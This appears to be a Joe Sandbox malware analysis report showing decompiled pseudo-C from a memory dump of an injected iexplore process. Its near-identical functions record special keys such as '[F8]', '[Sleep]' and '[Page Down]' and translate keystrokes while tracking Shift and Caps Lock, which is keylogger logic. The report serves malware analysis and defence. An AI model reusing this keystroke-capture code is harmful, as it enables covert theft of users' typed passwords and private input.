Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F24], xrefs: 00C85BB0

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C14, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C14(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F8]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[F8], xrefs: 00C85C16
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85DA0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DA0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Sleep]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Sleep], xrefs: 00C85DA2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D02, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D02(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mode Change]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Mode Change], xrefs: 00C85D04
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D13, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D13(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Page Down], xrefs: 00C85D15
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85B48, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B48(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F19]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F19], xrefs: 00C85B4A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85CCF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CCF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play / Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

